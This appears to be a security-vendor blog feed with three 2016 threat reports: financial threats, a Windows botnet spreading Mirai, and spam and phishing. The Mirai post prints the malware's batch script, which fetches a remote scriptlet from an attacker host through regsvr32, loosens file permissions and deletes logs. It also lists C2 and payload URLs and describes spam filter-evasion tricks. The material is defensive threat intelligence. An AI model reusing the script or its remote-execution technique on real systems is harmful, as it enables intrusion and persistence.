Malware Alerts

Subscribe to Malware Alerts feed Malware Alerts
Online headquarters of Kaspersky Lab security experts.
Updated: 48 min 36 sec ago

Financial cyberthreats in 2016

Wed, 02/22/2017 - 03:55

In 2016 we continued our in-depth research into the financial cyberthreat landscape. We’ve noticed over the last few years that large financial cybercriminal groups have started to concentrate their efforts on targeting large organizations – such as banks, payment processing systems, retailers, hotels and other businesses where POS terminals are widely used.

For example, the financial cybercrime group Carbanak and its followers, the so-called SWIFT hackers, have been able to steal millions of dollars from its roster of victims, which has included banks and other financial institutions. The benefits of this type of cybercrime are clear – going after the big fish means criminals can reap greater rewards. Even when the costs of preparing for, and executing, attacks against large organizations like this, are high.

Despite this trend, regular users and smaller and medium businesses cannot rest on their laurels. The number of attacked users of this calibre started to grow again in 2016, following a decline in 2014 and 2015. Our report provides an overview of the types of attack users are up against as the financial cyberthreat landscape continues to evolve.

Financial phishing attacks

Financial phishing is one of the most widespread types of cybercriminal activity and in 2016 we saw it become even more prevalent, increasing both in volume and in professionalism.

For the first time in 2016, the detection of phishing pages which mimicked legitimate banking services took first place in the overall chart – as criminals sought to trick their victims into believing they were looking at genuine banking content or entering their details into real banking systems.

  • In 2016 the share of financial phishing increased 13.14 percentage points to 47.48% of all phishing heuristic detections. This result is an all-time high according to Kaspersky Lab statistics for financial phishing caught on Windows-based machines.
  • Every fourth attempt to load a phishing page blocked by Kaspersky Lab products was related to banking phishing.

The percentage of financial phishing detected by Kaspersky Lab in 2014-2016

Banking malware:

In 2016 the number of users attacked with malware targeting financial data started increasing once more, following a decrease in 2014 and 2015.

  • In 2016 the number of users attacked with banking Trojans increased by 30.55% to reach 1,088,900.
  • 17.17% of users attacked with banking malware were corporate users.
  • Users in Russia, Germany, Japan, India, Vietnam and the US are the ones most often attacked by banking malware.
  • Zbot remained the most widespread banking malware family (44.08% of attacked users) but in 2016 it was actively challenged by the Gozi family (17.22%).

The trends show us that although professional cybercriminal groups have indeed shifted a lot of their attention to targeted attacks against large companies, regular users and smaller firms are still being targeted with the help of widespread malware including Zbot, Gozi, Nymaim, Shiotob, ZAccess, Tinba, Shiz and more.

The dynamic change in the number of users attacked with banking malware 2015-2016

Android banking malware:

Android banking Trojans deserve a mention in our financial cyberthreat report due to some particularly interesting activity. From mid-2016 we discovered that the number of attacked Android users was increasing at an exponential rate, from just 3,967 attacked users in January to around 75,000 in October 2016.

  • In 2016 the number of users that encountered Android malware increased 430% to reach 305,000 worldwide.
  • Russia, Australia and Ukraine are the countries with the highest percentage of users attacked by Android banking malware.

Interestingly we discovered that just two families of malware were responsible for this sudden change: Asacub and Svpeng, which affected a large number of users, most of whom were in Russia. While Asacub was distributed actively via SMS, Svpeng was spread through Google AdSense and took advantage of a security issue in a popular mobile browser.

The change in the number of users attacked with Android banking malware 2015-2016

It’s clear that financial cybercriminals are increasingly on the look-out for new ways to exploit users and extract money from them. Owners of Android-based devices should be extremely cautious when surfing the web – especially if they have financial applications installed.

But caution is advised for everyone. As predators become more persistent and as their methods grow more convincing, corporate users and home users alike – whatever type of device they use – need to be aware of the dangers and understand how to protect themselves from this ever-evolving cyberthreat landscape.

Fill out the form below to receive the full text of the Financial cyberthreats landscape in 2016 report.

MktoForms2.loadForm("//app-sj06.marketo.com", "802-IJN-240", 10140);

New(ish) Mirai Spreader Poses New Risks

Tue, 02/21/2017 - 03:56

A cross-platform win32-based Mirai spreader and botnet is in the wild and previously discussed publicly. However, there is much information confused together, as if an entirely new IoT bot is spreading to and from Windows devices. This is not the case. Instead, an accurate assessment is that a previously active Windows botnet is spreading a Mirai bot variant. So let’s make a level-headed assessment of what is really out there.

The earliest we observed this spreader variant pushing Mirai downloaders was January 2016. This Windows bot is not new. The Windows bot’s spreading method for Mirai is very limited as well – it only delivers the Mirai bots to a Linux host from a Windows host if it successfully brute forces a remote telnet connection. So we don’t have a sensational hop from Linux Mirai to Windows Mirai just yet, that’s just a silly statement. But we do have a new threat and practical leverage of the monolithic Windows platform to further spread Mirai to previously unavailable resources. In particular, vulnerable SQL servers running on Windows can be a problem, because they can be Internet facing, and have access to private network connecting IP-based cameras, DVR, media center software, and other internal devices.

So, we observe a previously active bot family that now spreads Mirai bots to embedded Linux systems over a very limited delivery vector. It spreads both its own bot code and the new Mirai addition in stages, using multiple web resources and servers. These servers help provide a better timeline of operation for the operator. One of the directly related web hosts at downs.b591[.]com has been serving bot components since at least August 2014. And most of the bot’s functionality clearly traces back to public sources at least as early as 2013. It’s not the freshest code or most impressive leap.

Regardless, it’s unfortunate to see any sort of Mirai crossover between the Linux platform and the Windows platform. Much like the Zeus banking trojan source code release that brought years of problems for the online community, the Mirai IoT bot source code release is going to bring heavy problems to the internet infrastructure for years to come, and this is just a minor start.

Notably, the 2016 Mirai operations were unique for two reasons:

  • newly practical exploitation and misuse of IoT devices (mainly DVR, CCTV cameras, and home routers) on a large scale
  • record setting DDoS traffic generation, exceeding all previous volumes

The great volume of this Mirai-generated DDoS traffic in October 2016 took down a portion of the internet, and was severe enough to initiate investigations by the FBI and the DHS. At the time, they had not ruled out nation states’ activity due to the overall power of the Mirai botnets. But even those attacks were far from the work of nation states. Time will only tell if nation states choose to hide their destructive activity in plain sight in the Internet of Things – the capabilities are clearly available. Could we see a nation state interested in taking down wide swaths of the internet using this juvenile toolset? It’s very possible.

In response to the huge problem this poses to the internet infrastructure, over the past few months, our team and CERT have participated in multiple successful command and control takedown efforts that otherwise have posed problems for partners simply providing notifications. While some security researchers may describe these takedowns as “whack a mole”, these efforts resulted in relief from Gbps DDoS storms for major networks. And, we are happy to partner with more network operators to leverage our connections with CERTs, LE, and other partners around the world to further enable this success.

The Windows Spreader – Who What Where

This Windows bot code is richer and more robust than the Mirai codebase, with a large set of spreading techniques, including brute forcing over telnet, SSH, WMI, SQL injection, and IPC techniques. Some of the bot executables are signed with certificates stolen from Chinese manufacturers. The code runs on Windows boxes, and checks in to a hardcoded list of c2 for hosts to scan and attack. Upon successful intrusion, it can spread the Linux Mirai variant as needed over telnet. If tftp or wget are not present on the remote system, it attempts to copy a downloader to the system and executes it there. This downloader will pull down and execute the final Mirai bot. These devices include

  • IP-based cameras
  • DVR
  • Media center appliances
  • Various Raspberry and Banana Pi

Unfortunately, this code is clearly the work of a more experienced bot herder, new to the Mirai game, and possibly one that is not juvenile like the original Mirai operator set. Based on multiple artefacts, the word choice from string artefacts, the code having been compiled on a Chinese system, that the host servers are maintained in Taiwan, abuse of stolen code-signing certificates exclusively from Chinese companies, and other characteristics, it is likely that this developer/operator is Chinese speaking.

The addition of a Chinese-speaking malware author with access to stolen code-signing certificates, with the ability to rip win32 offensive code from multiple offensive projects effective against MSSQL servers around the world, and the ability to port the code into an effective cross-platform spreading bot, introduces a step up from the juvenile, stagnating, but destructive Mirai botnet operations of 2016. It introduces newly available systems and network for the further spread of Mirai bots. And it demonstrates the slow maturing of Mirai now that the source is publicly available.

Below is a proportional comparison of the second stage component’s IP geolocations (fb7b79e9337565965303c159f399f41b), frequently downloaded by vulnerable MSSQL and MySQL servers. It is served from one of two web hosts, both hosted in Taiwan :

http://down.mykings[.]pw:8888/ups.rar

http://up.mykings[.]pw:8888/ups.rar

When downloaded, it is copied to disk with one of several filenames and executed:

cab.exe, ms.exe, cftmon.exe

Clearly, emerging markets with heavy investment in technology solutions are hit the heaviest by this component.

Components

The bot code and various components have been pulled together from other projects and previous sources. At runtime, code delivery occurs in a series of stages, from scanning and attacking online resources to downloading additional configuration files, fetching further instruction, and downloading and running additional executable code. Again, mostly all of these components, techniques, and functionality are several years old and are very large file objects.

Windows Spreader Infection Process
i.e. c:\windows\system\msinfo.exe (5707f1e71da33a1ab9fe2796dbe3fc74)
Changes DNS settings to 114.114.114.114, 8.8.8.8.
downloads and executes
from hxxp://up.mykings[.]pw:8888/update.txt (02b0021e6cd5f82b8340ad37edc742a0)
hxxp://up.mykings[.]pw:8888/ver.txt (bf3b211fa17a0eb4ca5dcdee4e0d1256)

Downloads

hxxp://img1.timeface[.]cn/times/b27590a4b89d31dc0210c3158b82c175.jpg (b27590a4b89d31dc0210c3158b82c175) to c:\windows\system\msinfo.exe (5707f1e71da33a1ab9fe2796dbe3fc74)

and runs with command line parameters “-create” “-run”

Downloads and executes hxxp://down.mykings[.]pw:8888/my1.html (64f0f4b45626e855b92a4764de62411b)

This file is a command shell script that registers a variety of files, including database connectivity libraries, and cleans up unneeded traces of itself on the system.

http://up.mykings[.]pw:8888/ups.rar (10164584800228de0003a37be3a61c4d)

It copies itself to the tasks directory, and installs itself as a scheduled job.
c:\windows\system\my1.bat
c:\windows\tasks\my1.job
c:\windows\system\upslist.txt
c:\windows\system32\cmd.exe /c sc start xWinWpdSrv&ping 127.0.0.1 -n 6 && del c:\windows\system\msinfo.exe >> NUL
c:\program files\kugou2010\ms.exe (10164584800228de0003a37be3a61c4d)

Keylogger (hosted as comments within jpeg files)

This botnet operator hosts components embedded within jpeg comments, a technique they have been using since 2013. These techniques provide very large file objects. So, even a fresh image downloaded by this bot of Taylor Swift contains 2.3mb of keylogging code first seen 2016.10.30 (ad0496f544762a95af11f9314e434e94):

Modular bot code

Also interesting in this variant is the variety of its spreader capabilities in the form of blind SQLi (sql injection) and brute forcing techniques, compiled in from a “Cracker” library. This library enables “tasking” of various attacks. The bots are instructed on individual tasks per an encrypted file downloaded from the available c2.

[Cracker:IPC][Cracker:MSSQL]
[Cracker:MySQL][Cracker:RDP][Cracker:SSH][Cracker:RDP][Cracker:Telnet][Cracker:WMI]

The Windows bot’s source appears to be developed in a fairly modular manner in C++, as functionality is broken out across source libraries:

CheckUpdate.cpp
Cracker_Inline.cpp
Cracker_Standalone.cpp
cService.cpp
CThreadPool.cpp
Db_Mysql.cpp
Dispatcher.cpp
IpFetcher.cpp
libtelnet.cpp
Logger_Stdout.cpp
Scanner_Tcp_Connect.cpp
Scanner_Tcp_Raw.cpp
ServerAgent.cpp
Task_Crack_Ipc.cpp
Task_Crack_Mssql.cpp
Task_Crack_Mysql.cpp
Task_Crack_Rdp.cpp
Task_Crack_Ssh.cpp
Task_Crack_Telnet.cpp
Task_Crack_Wmi.cpp
Task_Scan.cpp
WPD.cpp
catdbsvc.cpp
catadnew.cpp
catdbcli.cpp
waitsvc.cpp
errlog.cpp

Code signing certificates

The code signing certificates appear to be stolen from a solar and semiconductor grinding wafer products manufacturer in Northwest China, and an expired one.

Kaspersky Lab products detect and prevent infections from these bots.

File object scan verdicts

Trojan.Win32.SelfDel.ehlq
Trojan.Win32.Agent.ikad
Trojan.Win32.Agentb.btlt
Trojan.Win32.Agentb.budb
Trojan.Win32.Zapchast.ajbs
Trojan.BAT.Starter.hj
Trojan-PSW.Win32.Agent.lsmj
Trojan-Downloader.Win32.Agent.hesn
Trojan-Downloader.Win32.Agent.silgjn
HEUR:Trojan-Downloader.Linux.Gafgyt.b
Backdoor.Win32.Agent.dpeu
DangerousPattern.Multi.Generic (UDS)

Behavioral verdicts

Trojan.Win32.Generic
Trojan.Win32.Bazon.a
Trojan.Win32.Truebadur.a
DangerousObject.Multi.Chupitio.a

Appendix c2 and url

http://dwon.f321y[.]com:280/mysql.exe
http://downs.f4321y[.]com:280/psa.jpg
https://down2.b5w91[.]com:8443
http://down.f4321y[.]com:8888/kill.html
http://down.f4321y[.]com:8888/test.html
http://down.f4321y[.]com:8888/ups.rar
http://67.229.225.20
http://down.f4321y[.]com
http://up.f4321y[.]com
http://up.f4321y[.]com:8888/ver.txt
http://up.f4321y[.]com:8888/ups.rar
http://up.f4321y[.]com:8888/update.txt
http://up.f4321y[.]com:8888/wpdmd5.txt
http://up.f4321y[.]com:8888/wpd.dat
http://down.F4321Y[.]com:8888/my1.html
http://up.mykings[.]pw:8888/ver.txt
http://up.mykings[.]pw:8888/ups.rar
http://up.mykings[.]pw:8888/update.txt
http://up.mykings[.]pw:8888/wpdmd5.txt
http://up.mykings[.]pw:8888/wpd.dat
http://down.mykings[.]pw:8888/my1.html
http://down.mykings[.]pw:8888/ups.rar
http://down.mykings[.]pw:8888/item.dat
http://js.f4321y[.]com:280/v.sct
http://down.b591[.]com:8888/ups.exe
http://down.b591[.]com:8888/ups.rar
http://down2.b591[.]com:8888/ups.rar
http://down2.b591[.]com:8888/wpd.dat
http://down2.b591[.]com:8888/wpdmd5.txt
http://down2.b591[.]com:8888/ver.txt
http://up.f4321y[.]com:8888/ups.rar
http://ww3.sinaimg[.]cn/mw690/717a8b4dgw1f99ly7blarj20c40e4b2a.jpg
http://img1.timeface[.]cn/times/a4c7eb57bb7192a226ac0fb6a80f2164.jpg
http://downs.b591[.]com:280/ppsa.jpg
http://down.b591[.]com:8888/test.html
http://downs.b591[.]com:280/pps.jpg
http://dwon.kill1234[.]com:280/cao.exe
http://down.b591[.]com:8888/ups.rar
http://down.b591[.]com:8888/ups.exe
http://down.b591[.]com:8888/cab.rar
http://down.b591[.]com:8888/cacls.rar
http://down.b591[.]com:8888/kill.html

Certificates

Xi’ an JingTech electronic Technology Co.,LTD
‎sn: 65 f9 b9 66 60 ad 34 c1 c1 fe f2 97 26 6a 1b 36
Partner Tech(Shanghai)Co.,Ltd
sn: 26 59 63 33 50 73 23 10 40 17 81 35 53 05 97 60 39 76 89

Md5

e7761db0f63bc09cf5e4193fd6926c5e
c88ece9a379f4a714afaf5b8615fc66c
91a12a4cf437589ba70b1687f5acad19
a3c09c2c3216a3a24dce18fd60a5ffc2
297d1980ce171ddaeb7002bc020fe6b6
5707f1e71da33a1ab9fe2796dbe3fc74
a4c7eb57bb7192a226ac0fb6a80f2164
64f0f4b45626e855b92a4764de62411b
02b0021e6cd5f82b8340ad37edc742a0
10164584800228de0003a37be3a61c4d
fd7f188b853d5eef3760228159698fd8
cbe2648663ff1d548e036cbe4351be39
fb7b79e9337565965303c159f399f41b
eb814d4e8473e75dcbb4b6c5ab1fa95b
04eb90800dff297e74ba7b81630eb5f7
508f53df8840f40296434dfb36087a17
93ccd8225c8695cade5535726b0dd0b6
62270a12707a4dcf1865ba766aeda9bc
43e7580e15152b67112d3dad71c247ec
0779a417e2bc6bfac28f4fb79293ec34
ac8d3581841b8c924a76e7e0d5fced8d
cf1ba0472eed104bdf03a1712b3b8e3d
4eee4cd06367b9eac405870ea2fd2094
21d291a8027e6de5095f033d594685d0
097d32a1dc4f8ca19a255c401c5ab2b6
5950dfc2f350587a7e88fa012b3f8d92
2d411f5f92984a95d4c93c5873d9ae00
9a83639881c1a707d8bbd70f871004a0
5cae130b4ee424ba9d9fa62cf1218679
2346135f2794de4734b9d9a27dc850e1
fe7d9bdbf6f314b471f89f17b35bfbcd
c289c15d0f7e694382a7e0a2dc8bdfd8
9098e520c4c1255299a2512e5e1135ba
db2a34ac873177b297208719fad97ffa
defff110df48eb72c16ce88ffb3b2207
c289c15d0f7e694382a7e0a2dc8bdfd8
c75bd297b87d71c8c73e6e27348c67d5
5af3bab901735575d5d0958921174b17
1a6fea56dc4ee1c445054e6bc208ce4f
ae173e8562f6babacb8e09d0d6c29276
ad0496f544762a95af11f9314e434e94

Contents of http://down.mykings[.]pw:8888/my1.html

@echo off
mode con: cols=13 lines=1
if exist C:\downs\runs.exe start C:\downs\runs.exe
md C:\Progra~1\shengda
md C:\Progra~1\kugou2010
md C:\download
regsvr32 /s shell32.dll
regsvr32 /s WSHom.Ocx
regsvr32 /s scrrun.dll
regsvr32 /s c:\Progra~1\Common~1\System\Ado\Msado15.dll
regsvr32 /s jscript.dll
regsvr32 /s vbscript.dll
start regsvr32 /u /s /i:http://js.f4321y[.]com:280/v.sct scrobj.dll
attrib +s +h C:\Progra~1\shengda
attrib +s +h C:\Progra~1\kugou2010
attrib +s +h C:\download
cacls cmd.exe /e /g system:f
cacls cmd.exe /e /g everyone:f
cacls ftp.exe /e /g system:f
cacls ftp.exe /e /g everyone:f
cacls c:\windows\help\akpls.exe /e /g system:f
cacls c:\windows\help\akpls.exe /e /g everyone:f
cacls C:\Progra~1\Common~1\System\ado\msado15.dll /e /g system:f
cacls C:\Progra~1\Common~1\System\ado\msado15.dll /e /g everyone:f
reg delete “HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” /v shell /f
del c:\windows\system32\wbem\se.bat
del c:\windows\system32\wbem\12345.bat
del c:\windows\system32\wbem\123456.bat
del c:\windows\system32\wbem\1234.bat
del c:\windows\system32\*.log
del %0
exit

Contents of http://up.mykings[.]pw:8888/update.txt

http://img1.timeface[.]cn/times/b27590a4b89d31dc0210c3158b82c175.jpg c:\windows\system\msinfo.exe

http://down.mykings[.]pw:8888/my1.html c:\windows\system\my1.bat

Relevant Links

https://malwaremusings.com/2013/04/10/a-look-at-some-ms-sql-attacks-overview/
https://isc.sans.edu/diary/21543
http://blog.malwaremustdie.org/2016/08/mmd-0056-2016-linuxmirai-just.html?m=1
https://securelist.com/blog/research/76954/is-mirai-really-as-black-as-its-being-painted/
https://threatpost.com/mirai-fueled-iot-botnet-behind-ddos-attacks-on-dns-providers/121475/
https://securelist.com/analysis/quarterly-malware-reports/77412/ddos-attacks-in-q4-2016/

Spam and phishing in 2016

Mon, 02/20/2017 - 05:57

The year in figures

According to Kaspersky Lab, in 2016:

  • The proportion of spam in email flows was 58.31%, which is 3.03 percentage points more than in 2015.
  • 62.16% of spam emails were no more than 2 KB in size.
  • 12.08% of spam was sent from the US.
  • Trojan.Win32.Bayrob was the most popular malware family distributed via email.
  • Germany (14.13%) was the country where email antivirus was triggered most often.
  • There were 154,957,897 instances of the Anti-Phishing system being triggered.
  • A total of 15.29% unique users were attacked by phishers.
  • Brazil suffered the highest number of phishing attacks, with 27.61% of the global total.
  • 47.48% of incidents triggering the heuristic component in the Anti-Phishing system targeted clients of various financial organizations.
World events in spam

In 2016, fraudulent spam exploited the theme of major sporting events: the European Football Championship, the Olympic Games in Brazil, as well as the upcoming World Cups in 2018 and 2022. Typically, spammers send out fake notifications of lottery wins linked to one of these events. The content of the fake messages wasn’t exactly very original: the lottery was supposedly held by an official organization and the recipient’s address was randomly selected from millions of other addresses. To get their prize, the recipient had to reply to the email and provide some personal information.

With these sport-themed emails more details were often included in DOC, PDF or JPEG attachments that also contained graphic elements such as official emblems, event and sponsor logos. Messages that displayed the spam text directly in the body of the email were not very numerous. To add a bit of variety to their messages, spammers resorted to an old trick: they changed the text, the email addresses used for feedback, sender addresses, the attachment names, the size, etc. At the same, emails with the same attachment could be found in our traps on numerous occasions over a period of several months.

In the fourth quarter of 2016, spammers turned their attention to the future World Cup tournaments scheduled for 2018 and 2022. Spam traffic often included fraudulent notifications of lottery wins exploiting this theme.

The football theme was also used in malicious spam. In particular, cybercriminals sent out fake notifications with scans taken from a website that publishes news about computer games and the world of football, apparently in an attempt to arouse interest among recipients. The attached ZIP archive included a JavaScript downloader detected by Kaspersky Lab as Trojan-Downloader.Script.Generic. This malware, in turn, downloaded other malicious software to the victim’s computer.

The subject of terrorism, which has remained an important global issue in recent years, was also exploited in spam mailings. Numerous so-called Nigerian letters were sent to users on behalf of both state organization employees and individuals. The details of the stories may have differed, but the senders’ intention was the same – to get the recipient’s attention with promises of large sums of money and make them join in a conversation. Nigerian letters exploiting the tense situation in Syria remained popular in 2016 and were actively used to trick users.

Malicious spam exploiting the theme of terrorism was less common. It was used to steal personal information, organize DDoS attacks and install additional malware on victims’ computers.

Email offers from Chinese factories

In the email traffic for 2016, we often came across messages from Chinese factories and plants advertising their products. These spammers offered both finished products as well as spare parts for a variety of different spheres.

The text of a typical spam message began with an impersonal greeting to the recipient, followed by the name and surname of the factory manager. Often, the email described the merits of the company, its achievements and types of certification. The products offered by the company were either listed in the email or sent at the request of the recipient. For greater clarity, some of the emails also contained pictures of the goods on offer. At the end of the message, there were contact details (phone, mobile phone and fax numbers, email address, various messengers). Sometimes the contact details were specified in the image attached to the email.

The authors of the emails were representatives of the manufacturers, but the sender addresses were registered with both free email services and the companies’ domain names. Sometimes the messages included a company website, if the company had one.

In many countries, there was a time when small and medium-sized businesses preferred to use spam to promote their products. But users began to view this kind of advertising as undesirable, anti-spam laws were introduced, and, most importantly, new, more targeted, convenient and less intrusive advertising platforms appeared, with social networking sites prominent among them. We can only presume why Chinese businesses have not followed this trend (given that China has passed its own anti-spam law, which is one of the strictest in the world). The fact is that social networks in China are mainly internal, with global giants such as Facebook not permitted. As a result, Chinese entrepreneurs have far fewer legal means of entering the international market.

A year of ransomware in spam

In 2016, we recorded a huge amount of malicious spam. In previous years, Fraud.gen was the program most often used in malicious attachments. It appears in the form of an HTML page and is designed to steal the victim’s credit card data. In 2016, the absolute leaders in spam were Trojan downloaders that download ransomware to the victim’s computer. The most popular were mass spam mailings sent out to infect user computers with the Locky encryptor. However, other ransomware such as Petya, Cryakl and Shade were also widespread.

The number of malicious programs began to increase in December 2015 and continued to grow in waves throughout the year. The sharp falls were mainly caused by the fact that cybercriminals temporarily disabled the Necurs botnet, responsible for the majority of spam spreading Locky. Once the botnet was up and running again, the cybercriminals changed the spam templates.

Quantity of malicious emails in spam, 2016

In 2016, the Anti-Phishing system was triggered 239,979,660 times on the computers of Kaspersky Lab users, which is four times more than the previous year.

Such extensive use of ransomware may be due to the availability of this sort of malware on the black market. Currently, cybercriminals can not only rent a botnet to send out spam but also connect to so-called Ransomware-as-a-Service. This means that the attacker may not be a hacker in the traditional sense, and may not even know how to code.

Malicious spam messages often imitated personal correspondence, prompting recipients to view attached documents under various pretexts. Cybercriminals also sent out fake bills, or receipt notifications or even messages from office equipment with scanned documents allegedly attached.

Both examples above contain an attachment in the form of a malicious file with a .wsf extension, detected by Kaspersky Lab as Trojan-Downloader.JS.Agent.myd. The malicious file is written in JavaScript and downloads a Locky encryptor modification to the victim’s machine.

This screenshot shows an attachment containing a malicious file with a .jse extension, detected by Kaspersky Lab as Trojan-Downloader.JS.Cryptoload.auk. This is yet another malicious file written in JavaScript that downloads a Locky encryptor modification to the victim’s machine.

Overall, a wide variety of malicious attachments were used. As a rule, these were archives containing programs written in Java and JavaScript (JS files, JAR, WSF, WRN, and others), but there were also office documents with macros (DOC, DOCX, XLS, RTF) as well as classic executable files (EXE). Sometimes rare archive formats such as CAB were used.

When launched, ransomware programs encrypt the data on a user’s computer and demand a ransom (usually in bitcoins via the Tor network). More details about these programs can be found in our report Kaspersky Security Bulletin 2016. The ransomware revolution.

Spammer tricks Adding ‘noise’ to text

To make each email unique, spammers insert random sequences of characters in their messages that are invisible to the user. This trick is not new, but spammers continue to use it, perfecting their methods. Below we describe the most popular tricks of 2016 used by spammers to add ‘noise’. All the examples below are taken from real-life spam messages.

  1. Small letters and/or white text.

    The easiest and oldest trick: the text can be written in white font (ffffff – 16 hexadecimal code written in white).

    In this example, the random sequence of letters written in very small print and in white are arranged between words of a standard size in the sentence “You have received a £500”.

  2. Text that is not displayed.

    With the help of the attribute style = “display: none;” text in an email is simply not displayed. In standard situations, this tag is used in rough drafts, for example. When it comes to spam, these tags, containing random text, are inserted in messages in large quantities and if the anti-spam filter is not set up to process such tags, the text of an email practically disappears.

    The same effect can be achieved by inserting a random sequence written in zero font:

  3. Placing text outside the screen range.

    Yet another way to make junk text invisible to the user is to write it in standard font, but insert it in parts of the email that are beyond the screen frame (to the extreme left or right, or below the main part):

  4. Using tags that by default are not visible to users.

    Sometimes random text is inserted in tags that are not designed to display text to the user. Typically, comment tags are used, though there are other examples:

    The content of the <noscript> tag is only displayed on computers with unsupported or disabled scripts, so most users will not see it.

  5. Using tags to add noise

    Rather than using random sequences of characters that are made invisible, sometimes text is obfuscated with tags that have no value and cannot be interpreted:

    The number of these sorts of tags in some spam emails can be in the hundreds.

    Sometimes a very random sequence is inserted inside a tag as its attribute, rather than between specific tags:

    This attribute will, of course, not be interpreted either and will not be displayed in the email that the user sees.

Masking links

There may be numerous ways of altering text in an email, but when it comes to URLs in spam messages, the situation is different. There can be lots of URLs in a single mass mailing (even reaching into the thousands), but they are subject to more limitations, as spammers have to pay for the purchase of each domain. However, attackers have come up with different techniques to make each link unique while also ensuring it opens correctly when clicked.

  1. Obfuscation of domains using the UTF range:

    In last year’s report we described some spammer tricks that involved different ways of expressing domain names and IP addresses. The trend for writing domain names using symbols from different UTF ranges and using different numerical systems for IP addresses continued in 2016.

    Especially popular with spammers were mathematical alphanumeric symbols. For example:

    Domain written using mathematical bold script.

    Domain written using mathematical monospace small.

    The range is designed for specific mathematical formulas and must not be used in plain text or hyperlinks.

  2. Mixing encodings

    The above trick was diversified by mixing encodings: spammers use the Latin alphabet in Unicode to write some of the domain characters, while the rest are written using characters from special URL-encoded ranges.

    The domain from the example above is first changed to:

    and then to server119.bullten.org.

  3. URL shortening services with added noise

    In addition to the various ways of writing the actual spammer site, from time to time cybercriminals use another trick to avoid mentioning the site directly in an email. This involves the use of URL shortening services and redirects. In 2016, spammers also resorted to a variety of other methods to add noise to each URL.

    They inserted characters, slashes and dots between the URL shortening service and the actual link identifier (the meaningful part is marked in bold; the rest is noise):

    Sometimes comment tags end up there:

    To deceive filters further, the names of different, usually well-known, sites are inserted in the noise part:

    All these parts will be dropped when the link is clicked.

    Yet another way to obfuscate a link is to add non-existent parameters to the end of the link:

    Everything that comes after the question mark in the link is not actually part of the URL – these characters are, in fact, parameters. The parameters can include a variety of information: for example, the unsubscribe link often contains the email address that needs to be entered in the unsubscribe form. However, URL shortening services, like many other sites, do not require or accept any parameters, so this part of the URL is simply dropped during the redirect process. Spammers take advantage of this and insert random sequences of parameters. In this particular case, the .pdf extension is added to the end of the parameters. This is not done to confuse the filters but rather the user, who is likely to think the link leads to a PDF file.

  4. Prefixes

    As well as parameters that can be added to the end of a link, noise elements can also be added to the beginning. These elements may include symbols that are ignored by the link interpreter when a redirect occurs, for example:

    (In this example, in addition to the noise at the beginning of the link and nonexistent parameters at the end, the link itself is an IP address written partially in octal and partially in hexadecimal encoding.)

    The most common technique for adding noise at the beginning of a link is to use the @ symbol. The @ symbol inserted before the domain can be utilized to identify the user in the domain (something that is no longer really applied these days). For sites that do not require identification, everything that comes before @ will simply be ignored by the browser.

    The symbol is useful for spammers because it allows them not only to add noise to the link but also to make it look more trustworthy to the user by specifying a well-known site before the @ symbol.

  5. Masked redirects

    Redirects have long been used by spammers to hide the main domain. We have already written about this in some detail. In 2016, the redirect methods used were not that diverse, but links with redirects were also obfuscated. The methods used were the same as those used with URL shortening services: the @ symbol, parameters and additional characters.

    Cybercriminals often used several techniques at once – concealing and obfuscating the original link:

    In the example below, the name of the site used to distract the user’s attention comes before the @ symbol, followed by the redirect to the URL shortening service (which is also just noise with several @ symbols), and it is only from this part that the user will get to the spammer’s site.

    Statistics Proportion of spam in email traffic

    In 2016, the proportion of spam in email traffic was 58.31%, which is 3.03 percentage points higher than the previous year.

    The proportion of spam in email traffic, 2016

    The lowest volume – 54.61% – was registered in February of 2016. After that, the proportion of spam grew steadily and reached a peak by the end of the year – 61.66% in November.

    Interestingly, the last time there was an annual increase in the proportion of spam in email traffic was eight years ago. Since then, the percentage of spam has fallen continuously from its peak of 85.2% in 2009, to 55.28% in 2015. We believe this was due to legitimate small and medium-sized businesses gradually phasing out their use of spam, turning instead to legal advertising platforms.

    The proportion of spam in global email traffic, 2009-2016

    This downward trend may now have come to a halt because all those who wanted to or could refrain from using spammer services have, for the most part, already done so. This slight growth is the result of a sharp increase in spam containing malicious attachments.

    Sources of spam by country

    Sources of spam by country, 2016

    In 2016, the top three sources of spam saw some changes: India climbed to third place with 10.15% due to a substantial growth in the volume of spam distributed (+7.19 p.p.). Such a dramatic increase may have been caused by botnets being organized in the region. Vietnam (10.32%) added 4.19 p.p. to its share and also moved up the rankings to second place. The US (12.08%) remained the clear leader despite a decrease of 3.08 p.p.

    China’s share (4.66%) fell by 1.46 p.p., though it remained in fourth. Following close behind were two Latin American countries – Mexico (4.40%) and Brazil (4.01%). Russia (3.53%), among the top three in 2015, ranked seventh in 2016 after seeing a 2.62 p.p. decrease in its share of distributed spam.

    France (3.39%, +0.22 p.p.) and Germany (3.21%, -1.03 p.p.) came eighth and ninth respectively. Turkey rounded off the Top 10 with a share of 2.29%, which is 0.34 p.p. more than in 2015.

    The size of spam emails

    The proportion of super-short spam emails (under 2 KB) dropped in 2016 and averaged 62.16%. This is 16.97 p.p. lower than in the previous year. The share of emails sized 2-5 KB also fell to 4.70%.

    The size of spam emails in 2016

    Meanwhile, the proportion of bigger emails increased considerably: 5-10 KB (6.15%), 10-20 KB (14.47%) and 20-50 KB (10.08%). It means that 2016 saw a trend towards fewer super-short spam emails and more emails of average size – from 5-50 KB. This was caused by a sharp increase in the proportion of spam with malicious attachments.

    Malicious attachments in email Malware families

    TOP 10 malware families, 2016

    In 2016, Trojan-Downloader.JS.Agent was the most widespread malware family. A typical representative of this malware family is an obfuscated Java script using ADODB.Stream technology to download and run DLL, EXE and PDF files.

    The Trojan-Downloader.VBS.Agent family occupied second place. They are VBS scripts utilizing ADODB.Stream technology to download ZIP archives and run software extracted from them.

    In third place was Trojan-Downloader.MSWord.Agent. These malicious programs are DOC files with an embedded macro written in Visual Basic for Applications (VBA) that runs when the document is opened. The macro downloads another malicious file from a malicious site and runs it on the user’s computer.

    Trojan-Downloader.JS.Cryptoload in fourth is a malware family whose representatives are an obfuscated JavaScript that downloads and runs encryptors.

    Trojan.Win32.Bayrob rounded off the top five. The malicious programs from this Trojan family can download and run additional modules from the command server, as well as act as a proxy server. They are used to send out spam and steal personal data.

    The Trojan-PSW.Win32.Fareit family came sixth. These malicious programs are designed to steal data, such as the credentials of FTP clients installed on the infected computer, login details for cloud storage, cookie files in browsers, email passwords. Fareit Trojans send the collected information to a malicious server. Some members of the family are able to download and run other malware.

    The representatives of the Trojan-Downloader.JS.SLoad family in seventh are JS scripts that download and run other malware, mostly encryptors, on the victim computer.

